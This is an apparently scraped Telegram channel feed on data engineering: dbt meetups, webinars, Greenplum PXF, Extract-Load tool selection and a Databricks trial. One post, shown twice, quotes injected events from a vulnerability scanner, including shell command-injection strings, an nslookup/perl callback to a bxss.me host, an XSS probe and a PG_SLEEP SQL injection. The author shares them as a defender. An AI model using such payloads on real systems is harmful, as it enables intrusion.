Data Apps Design
Привет! Сегодня продолжаем – 2 часть вебинара: Extract - Load как сервис и как собственное решение. Поиск баланса и дзен – 1. In-house EL + LIVE MaestroQA + Airflow – 2. Гибридные подходы + LIVE Airbyte – 3. Жизнь после EL – Transform & Deliver – dbt + Looker…
Посмотреть слайды обоих дней можно по ссылке:
https://docs.google.com/presentation/d/1S3H02t8plk_XbZVKvWfWy6ZY36QTPO3FDbZMeYO4n9U/edit?usp=sharing
https://docs.google.com/presentation/d/1S3H02t8plk_XbZVKvWfWy6ZY36QTPO3FDbZMeYO4n9U/edit?usp=sharing
Google Docs
DE Intensive – Extract - Load как сервис и как собственное решение
Онлайн образование otus.ru
Во вторник 14 июня в 19.00 в рамках развития сообщества @dbt_users будет проведен второй митап, посвященный инструменту dbt.
Интереснейшие доклады ребят из Wheely, ADV/web-engineering co., Space307 и NabuMinds:
– dbt + Clickhouse: кластер, версионирование данных и другие сложности реализации
– Data Quality в Modern Data Stack
– Зрелость dbt-проекта. Есть, куда расти?
– dbt в etl-командах: снимаем типовые боли байтовозов
Слоты фиксированы по времени, можно подключаться на любой доклад. После каждого доклада есть время на вопросы-ответы и общение.
Ссылка на ютуб придет как обычно перед началом митапа. До встречи 😉
https://space307.team/dbtmeetup
Интереснейшие доклады ребят из Wheely, ADV/web-engineering co., Space307 и NabuMinds:
– dbt + Clickhouse: кластер, версионирование данных и другие сложности реализации
– Data Quality в Modern Data Stack
– Зрелость dbt-проекта. Есть, куда расти?
– dbt в etl-командах: снимаем типовые боли байтовозов
Слоты фиксированы по времени, можно подключаться на любой доклад. После каждого доклада есть время на вопросы-ответы и общение.
Ссылка на ютуб придет как обычно перед началом митапа. До встречи 😉
https://space307.team/dbtmeetup
Мой доклад стартует в 19.05:
Зрелость DBT-проекта. Есть, куда расти?
– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя
Зрелость DBT-проекта. Есть, куда расти?
– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя
Data Apps Design
Во вторник 14 июня в 19.00 в рамках развития сообщества @dbt_users будет проведен второй митап, посвященный инструменту dbt. Интереснейшие доклады ребят из Wheely, ADV/web-engineering co., Space307 и NabuMinds: – dbt + Clickhouse: кластер, версионирование…
Начинаем, подключайтесь:
https://www.youtube.com/watch?v=AxXv-988B1A
https://www.youtube.com/watch?v=AxXv-988B1A
YouTube
Dbt Meetup 2022-06-14
Митап для специалистов, использующих инструмент dbt для решения своих задач.
Таймкоды:
00:00 Приветствие
1:53–32:35 Артемий Козырь, Analytics engineer at Wheely — Зрелость DBT-проекта. Есть, куда расти?
36:05–59:45 Никита Баканчев, Senior data engineer…
Таймкоды:
00:00 Приветствие
1:53–32:35 Артемий Козырь, Analytics engineer at Wheely — Зрелость DBT-проекта. Есть, куда расти?
36:05–59:45 Никита Баканчев, Senior data engineer…
Слайды моего доклада с [dbt meetup]
Зрелость DBT-проекта. Есть, куда расти?
– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя
#meetup
🌐 @data_apps | Навигация по каналу
Зрелость DBT-проекта. Есть, куда расти?
– К чему стремимся, используя dbt?
– Матрица зрелости dbt-проекта
– Кейс Wheely + dbt
– Что дальше и как это использовать у себя
#meetup
Please open Telegram to view this post
VIEW IN TELEGRAM
Google Docs
[dbt meetup] 2022-06-14 Зрелость dbt-проекта
Зрелость dbt-проекта Есть, куда расти?
A very useful and handy implementation of Load step from ELT acronym.
Use this example to build your own Extract - Load solution and take into account all the possible outcomes and issues you may face in advance:
– Handling duplicate rows (even when uniqueness constraint is not enforced)
– Coping with DELETEs on source side (hard deletes)
– Allowing data inspection and time travel with metadata attributes
– Examples for Amazon Redshift, Google BigQuery, Snowflake
https://docs.hevodata.com/data-loading/loading-data-to-warehouse/
#elt #pipelines
Use this example to build your own Extract - Load solution and take into account all the possible outcomes and issues you may face in advance:
– Handling duplicate rows (even when uniqueness constraint is not enforced)
– Coping with DELETEs on source side (hard deletes)
– Allowing data inspection and time travel with metadata attributes
– Examples for Amazon Redshift, Google BigQuery, Snowflake
https://docs.hevodata.com/data-loading/loading-data-to-warehouse/
#elt #pipelines
Сегодня хотел бы поговорить о широко распространенной СУБД Greenplum и, в частности, о Platform Extension Framework (PXF) - расширении, с помощью которого открываются почти неограниченные возможности интеграции с множеством внешних систем и форматов данных.
В этой публикации Вас ждет:
– Основные возможности PXF, конфигурация, способы оптимизации.
– Организация Extract - Load с помощью PXF (Data Lake / OLTP).
– Объединение локальных и внешних таблиц в запросах (Federated queries).
– Запись данных во внешние системы (Clickhouse).
Читать на Хабр →
#pipelines #ELT #dwh #greenplum #pxf
В этой публикации Вас ждет:
– Основные возможности PXF, конфигурация, способы оптимизации.
– Организация Extract - Load с помощью PXF (Data Lake / OLTP).
– Объединение локальных и внешних таблиц в запросах (Federated queries).
– Запись данных во внешние системы (Clickhouse).
Читать на Хабр →
#pipelines #ELT #dwh #greenplum #pxf
Хабр
Сценарии применения Greenplum PXF для интеграции с Data Lake, OLTP, Clickhouse
Привет! Меня зовут Артемий Козырь, и я Analytics Engineer в Wheely. Популярность массивно-параллельных СУБД ( MPP ) для решения аналитических задач неукоснительно растет. Сегодня хотел бы...
Ух, как же много материала, которым хочется поделиться.
Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData
Будете ждать? 🤔
Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData
Будете ждать? 🤔
Somebody is overwhelming our analytics trying to find security breaches.
A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.
Looks like a vulnerability scanner is used. Take a look at the sample data:
What I've done so far:
1. Filtered out and deleted problem rows from database
2. Enforced data type checks
Curious case. Finally I have faced with tech pirates 😵💫
Let's see if it works fine. Any other ideas?
A brief infrastructure setup: we gather user events data in mobile apps (iOS, Android) and Web via Snowplow trackers, send it to Kafka queues, then land the data into DWH (Redshift) staging area.
Looks like a vulnerability scanner is used. Take a look at the sample data:
echo bvazvs$()\ igzdlg\nz^xyu||a #' &echo bvazvs$()\ igzdlg\nz^xyu||a #|" &echo bvazvs$()\ igzdlg\nz^xyu||a #Despite basic checks are enforced (non-empty string, valid json), around 1k events managed to get into DWH 😐
bxss.me/t/xss.html?%00
`(nslookup hitxbheyywgyq5e37d.bxss.me||perl -e "gethostbyname('hitxbheyywgyq5e37d.bxss.me')")`
aUV52Y1o' OR 826=(SELECT 826 FROM PG_SLEEP(15))--
^(#$!@#$)(()))******
What I've done so far:
1. Filtered out and deleted problem rows from database
2. Enforced data type checks
Curious case. Finally I have faced with tech pirates 😵💫
Let's see if it works fine. Any other ideas?
Data Apps Design
Ух, как же много материала, которым хочется поделиться. Не всё успеваю публиковать. Подал заявку на доклад на конфе SmartData Будете ждать? 🤔
Получил отказ
"Немного деталей, которые повлияли на наше решение:
То что вы применяете бест практики из разработки - это отлично, но для нашей конференции в докладе все же не хватает технического наполнения. Возможно, это потому что мы нацелины больше на инженеров, которые уже очень хорошо знакомы со системой контроля версий, CI/CD и вот это вот все. Нам кажется, что для нашей целевой аудитории доклад не будет иметь прикладной полезности."
Технические детали это: "Я говорила про различные вариации b-tree в движках, как пример того, насколько глубокие технические подробности нам интересны"
B-tree в аналитических СУБД и больших данных в 2022... Бугага 😂
Есть идеи, на какой RU конфе готовы слушать про Modern Data Stack / Analytics Engineering?
Про Сoalesce в курсе, но в этом году уже поздно.
"Немного деталей, которые повлияли на наше решение:
То что вы применяете бест практики из разработки - это отлично, но для нашей конференции в докладе все же не хватает технического наполнения. Возможно, это потому что мы нацелины больше на инженеров, которые уже очень хорошо знакомы со системой контроля версий, CI/CD и вот это вот все. Нам кажется, что для нашей целевой аудитории доклад не будет иметь прикладной полезности."
Технические детали это: "Я говорила про различные вариации b-tree в движках, как пример того, насколько глубокие технические подробности нам интересны"
B-tree в аналитических СУБД и больших данных в 2022... Бугага 😂
Есть идеи, на какой RU конфе готовы слушать про Modern Data Stack / Analytics Engineering?
Про Сoalesce в курсе, но в этом году уже поздно.
Getdbt
Coalesce Conference | Crafted by dbt Labs
Join dbt Labs and thousands of analytics professionals at our premier data conference, Coalesce.
Databricks + Wheely Proof of Concept
I will be assessing Databricks as our new data platform (to succeed AWS Redshift)
– Requirements to E - L - T
– Current setup description
– Proof of Concept plan
Desired business impact:
– Cost effective (at least compared to what we currently spend on AWS Redshift reserved flat rate)
– Performance gains desired
– Extended features support (H3, in-database ML, Advanced analytics, ...)
– Access to ecosystem (docs, solutions, code examples, how-to guides)
– Democratization of access to data and data-related services: built-in Notebook experience
– No degradation (performance, outage, timeouts, job failures) in comparison with current state
🌐 @data_apps | Навигация по каналу
I will be assessing Databricks as our new data platform (to succeed AWS Redshift)
– Requirements to E - L - T
– Current setup description
– Proof of Concept plan
Desired business impact:
– Cost effective (at least compared to what we currently spend on AWS Redshift reserved flat rate)
– Performance gains desired
– Extended features support (H3, in-database ML, Advanced analytics, ...)
– Access to ecosystem (docs, solutions, code examples, how-to guides)
– Democratization of access to data and data-related services: built-in Notebook experience
– No degradation (performance, outage, timeouts, job failures) in comparison with current state
Please open Telegram to view this post
VIEW IN TELEGRAM
Gist
Databricks + Wheely Proof of Concept
Databricks + Wheely Proof of Concept. GitHub Gist: instantly share code, notes, and snippets.
👍11😍1
Data Apps Design
Databricks + Wheely Proof of Concept I will be assessing Databricks as our new data platform (to succeed AWS Redshift) – Requirements to E - L - T – Current setup description – Proof of Concept plan Desired business impact: – Cost effective (at least…
❓ Very interesting. But what lacks in AWS Redshift?
AWS Redshift is really good. However
– Sometimes it seems to lack certain features (read GeoJSON, index geo data via H3 lib).
– It takes ~10 seconds to parse any query for the first time.
– I've faced with a couple of internal bugs (no. much affecting workloads, but still).
– I want to explore if I can save some costs if I use serverless solutions (pay as much as you have consumed compute resources).
– Using OSS formats like Parquet / Delta files might be beneficial
And I want to trial something else 😃🤔
AWS Redshift is really good. However
– Sometimes it seems to lack certain features (read GeoJSON, index geo data via H3 lib).
– It takes ~10 seconds to parse any query for the first time.
– I've faced with a couple of internal bugs (no. much affecting workloads, but still).
– I want to explore if I can save some costs if I use serverless solutions (pay as much as you have consumed compute resources).
– Using OSS formats like Parquet / Delta files might be beneficial
And I want to trial something else 😃🤔
👍4❤2😁1🤔1
26 октября (среда) в 20:00 проведу вебинар:
Работа с ГЕО-данными в DWH: координаты, зоны, агрегация
– Привязка событий к зонам на карте города
– Агрегирование и аналитика данных с помощью H3 (гексагоны)
– Оптмизация расчетов и производительности, кэширование
Расскажу подробно, как это устроено в проекте Wheely, над которым я работаю.
Как и зачем индексировать данные (например, с использованием библиотеки H3 от Uber).
Выполнение гео-операций, проверка вхождения точки в конкретные зоны (аэропорты, вокзалы, ТЦ, районы города).
⬇️ Ссылка на YouTube-трансляцию будет в этом канале
🌐 @data_apps | Навигация по каналу
Работа с ГЕО-данными в DWH: координаты, зоны, агрегация
– Привязка событий к зонам на карте города
– Агрегирование и аналитика данных с помощью H3 (гексагоны)
– Оптмизация расчетов и производительности, кэширование
Расскажу подробно, как это устроено в проекте Wheely, над которым я работаю.
Как и зачем индексировать данные (например, с использованием библиотеки H3 от Uber).
Выполнение гео-операций, проверка вхождения точки в конкретные зоны (аэропорты, вокзалы, ТЦ, районы города).
⬇️ Ссылка на YouTube-трансляцию будет в этом канале
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥6
Data Apps Design
26 октября (среда) в 20:00 проведу вебинар: Работа с ГЕО-данными в DWH: координаты, зоны, агрегация – Привязка событий к зонам на карте города – Агрегирование и аналитика данных с помощью H3 (гексагоны) – Оптмизация расчетов и производительности, кэширование…
Запись вебинара в YouTube: https://www.youtube.com/watch?v=IS5PIOhXLdk
Посмотреть слайды можно по ссылке:
https://docs.google.com/presentation/d/1Z-SLGvpHL2CbguVS-71-eCW6-I1olkrQxJhIPKtnKps/edit?usp=sharing
🌐 @data_apps | Навигация по каналу
Посмотреть слайды можно по ссылке:
https://docs.google.com/presentation/d/1Z-SLGvpHL2CbguVS-71-eCW6-I1olkrQxJhIPKtnKps/edit?usp=sharing
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Работа с ГЕО-данными в DWH: координаты, зоны, агрегация // Демо-занятие курса «Data Engineer»
На открытом уроке рассмотрим:
- Привязка событий к зонам на карте города;
- Агрегирование и аналитика данных с помощью H3 (гексагоны);
- Оптмизация расчетов и производительности, кэширование.
«Data Engineer» - https://otus.pw/4Ogq/
Преподаватель: Артемий…
- Привязка событий к зонам на карте города;
- Агрегирование и аналитика данных с помощью H3 (гексагоны);
- Оптмизация расчетов и производительности, кэширование.
«Data Engineer» - https://otus.pw/4Ogq/
Преподаватель: Артемий…
👍5🔥1
Важнейшие критерии при выборе Extract – Load решения для интеграции данных в DWH
В публикации резюмирую свои знания:
— Каталог поддерживаемых источников и приемников данных.
— Метод чтения данных из источников (Extract).
— Способы репликации в целевое Хранилище (Load).
— Работа с изменениями структуры данных (Schema Evolution).
— Трансформации перед загрузкой данных (EtLT).
— Тип развертывания решения (Deployment).
Буду объяснять и показывать примеры на сервисах, которые использовал сам: Hevo Data, Fivetran, Airbyte. Однако критерии универсальны и применимы для любых других систем подобного класса.
Читать на Хабр →
#Pipelines #ELT
🌐 @data_apps | Навигация по каналу
В публикации резюмирую свои знания:
— Каталог поддерживаемых источников и приемников данных.
— Метод чтения данных из источников (Extract).
— Способы репликации в целевое Хранилище (Load).
— Работа с изменениями структуры данных (Schema Evolution).
— Трансформации перед загрузкой данных (EtLT).
— Тип развертывания решения (Deployment).
Буду объяснять и показывать примеры на сервисах, которые использовал сам: Hevo Data, Fivetran, Airbyte. Однако критерии универсальны и применимы для любых других систем подобного класса.
Читать на Хабр →
#Pipelines #ELT
Please open Telegram to view this post
VIEW IN TELEGRAM
Хабр
Важнейшие критерии при выборе Extract – Load решения для интеграции данных в DWH
Если вопросы о том, зачем нужна интеграция данных, в чем различия ETL и ELT, как правило уже не требуют пояснений и ответов, и очевидны почти всем, то вопросы о том, какой именно Extract - Load сервис...
🔥7👍3
Databricks - пока понятно то, что ничего непонятно
Пробую Databricks
– Установка в свой аккаунт AWS, сделать может только администратор (это не я) - ОК
– Развертывание в Cloud Formation Stack в пару кликов, вроде удобно. Однако очень сложно понять, что происходит и зачем: S3, IAM, Lambda, CopyZips(??)
– Сразу поднялись 3 жирных EC2 Instances i3.xlarge (зачем??), явным образом меня об этом не спросили, это не было очевидно
– Очень много текста в документации, но хочется поглотить всё
Кто пользуется Databricks?
Какие самые главные советы можете дать?
Пробую Databricks
– Установка в свой аккаунт AWS, сделать может только администратор (это не я) - ОК
– Развертывание в Cloud Formation Stack в пару кликов, вроде удобно. Однако очень сложно понять, что происходит и зачем: S3, IAM, Lambda, CopyZips(??)
– Сразу поднялись 3 жирных EC2 Instances i3.xlarge (зачем??), явным образом меня об этом не спросили, это не было очевидно
– Очень много текста в документации, но хочется поглотить всё
Кто пользуется Databricks?
Какие самые главные советы можете дать?